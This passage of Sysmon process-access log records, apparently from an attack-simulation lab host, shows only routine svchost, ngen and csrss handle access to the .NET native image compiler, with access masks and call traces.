{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.913\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010464F0D00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.913","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010464F0D00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.945\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-00106DD00B00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.945","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-00106DD00B00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.945\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-00106DD00B00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.945","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-00106DD00B00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.960\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-001009530D00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.960","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-001009530D00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.976\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-00103D560D00}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.976","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-00103D560D00}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.976\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-00103D560D00}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.976","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-00103D560D00}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-00103D560D00}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-00103D560D00}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00101D5A0D00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 